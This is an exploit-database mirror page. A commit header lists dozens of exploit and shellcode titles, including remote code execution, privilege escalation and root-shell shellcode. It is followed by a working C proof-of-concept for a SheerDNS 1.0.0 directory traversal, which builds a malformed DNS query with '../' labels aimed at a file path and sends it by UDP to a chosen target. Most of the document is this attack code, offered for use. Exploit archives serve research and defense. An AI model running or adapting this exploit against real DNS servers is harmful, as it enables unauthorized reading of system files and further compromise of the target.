exploit-db-mirror/exploits/linux/remote/22485.c
Offensive Security 880bbe402e DB: 2019-03-08
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

150 lines
No EOL
3.8 KiB
C

// source: https://www.securityfocus.com/bid/7336/info
A vulnerability has been discovered in SheerDNS. Due to insufficient sanitization of DNS requests, an attacker may be able to view the contents of an arbitrary system directory or file. Information obtained by exploiting this issue may aid an attacker in launching further attacks against a target system.
This issue was discovered in SheerDNS version 1.0.0, however, earlier versions may also be affected.
/*
* SheerDNS 1.0.0 directory traversal POC.
* Jedi/Sector One <j@pureftpd.org>
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <getopt.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
void fill(char * const msg_, size_t *len)
{
register char *msg = msg_;
/* ID */
*msg++ = 2;
*msg++ = 4;
/* QR/OPCODE/AA/TC/RD/RA/Z */
*msg++ = 5;
*msg++ = 0;
/* QDCOUNT */
*msg++ = 0;
*msg++ = 1;
/* ANCOUNT */
*msg++ = 0;
*msg++ = 0;
/* NSCOUNT */
*msg++ = 0;
*msg++ = 0;
/* ARCOUNT */
*msg++ = 0;
*msg++ = 0;
/* QUERY */
*msg++ = 3; strcpy(msg, "../"); msg += 3;
*msg++ = 2; strcpy(msg, "./"); msg += 2;
*msg++ = 2; strcpy(msg, "./"); msg += 2;
*msg++ = 2; strcpy(msg, "./"); msg += 2;
*msg++ = 2; strcpy(msg, "./"); msg += 2;
*msg++ = 12; strcpy(msg, "/tmp/passwd"); msg += 11; *msg++ = 0;
*msg++ = 0;
/* QTYPE */
*msg++ = 0;
*msg++ = 1;
/* QCLASS */
*msg++ = 0;
*msg++ = 1;
/* FCS */
*msg++ = 0xc8;
*msg++ = 0x4c;
/* STOP */
*msg++ = 0x7e;
*len = (size_t) (msg - msg_);
}
void usage(const char * const prgname)
{
printf("Usage : %s [-s <source host>] -t <target host>\n",
prgname);
exit(0);
}
int main(int argc, char *argv[])
{
char msg[65500];
struct addrinfo hints, *res;
const char *source_host = NULL;
const char *target_host = NULL;
size_t len;
int kindy;
int fodder;
while ((fodder = getopt(argc, argv, "s:t:")) != -1) {
switch (fodder) {
case 's' :
if ((source_host = strdup(optarg)) == NULL) {
perror("strdup");
return 1;
}
break;
case 't' :
if ((target_host = strdup(optarg)) == NULL) {
perror("strdup");
return 1;
}
break;
default :
usage(argv[0]);
}
}
if (source_host == NULL || target_host == NULL) {
usage(argv[0]);
}
fill(msg, &len);
memset(&hints, 0, sizeof hints);
hints.ai_family = AF_UNSPEC;
hints.ai_addr = NULL;
if ((fodder = getaddrinfo(source_host, NULL, &hints, &res)) != 0) {
fprintf(stderr, "getaddrinfo : %s\n", gai_strerror(fodder));
return 1;
}
if ((kindy = socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
perror("socket");
return 1;
}
if (bind(kindy, (struct sockaddr *) res->ai_addr,
res->ai_addrlen) != 0) {
perror("bind");
return 1;
}
memset(&hints, 0, sizeof hints);
hints.ai_family = AF_UNSPEC;
hints.ai_addr = NULL;
if ((fodder = getaddrinfo(target_host, "domain", &hints, &res)) != 0) {
fprintf(stderr, "getaddrinfo : %s\n", gai_strerror(fodder));
return 1;
}
if (sendto(kindy, msg, len, 0, (const struct sockaddr *) res->ai_addr,
(socklen_t) res->ai_addrlen) <= (ssize_t) 0) {
perror("sendto");
return 1;
}
(void) close(kindy);
return 0;
}